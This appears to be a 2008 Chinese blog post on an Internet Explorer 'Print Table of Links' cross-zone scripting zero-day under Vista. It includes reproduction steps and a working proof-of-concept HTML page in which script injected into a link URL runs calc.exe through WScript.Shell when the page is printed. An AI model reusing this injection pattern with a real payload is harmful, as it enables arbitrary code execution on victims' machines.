最新Vista下的IE 0Day漏洞 - Holmesian Blog

最新Vista下的IE 0Day漏洞

post by Holmesian / 2008-5-20 2:56 Tuesday

Vista下的0Day漏洞
ASLR+DEP+UAC+PatchGuard+IE7(+IE8保护模式)+安全的1b的 Office2007+...

超级安全的架构终于露出一点问题了。。。。

MS Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

如果启用了 "Print Table of Links"，在打印一个网页的时候，能够导致执行任意代码，当然VISTA上UAC可以拦截它 :)

重现：
1.下面这个地方打上勾

2.把下面代码保存成HTML，用IE打开，打印之，calc.exe会弹出。

[quote]<html>
<body >
Print me with table of links to execute calc.exe
<a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a>
<script>window.print();</script>
</body>
</html>[/quote]

标签: ie 溢出漏洞 0day uac vista

你可能还感兴趣：
Windows漏洞利用工具--MS08067
低版本浏览器钓鱼
可怜的Discuz，幸运的PHPwind？！------一场闹剧
最新MySQL 0day利用代码
BoBlog任意变量覆盖漏洞
本地提权利器

« 不需要技术的刷Q币、QQ秀方法 | 刷机包的选择»

取消回复

发表评论：

名字

邮件地址 (选填)

个人网站 (选填)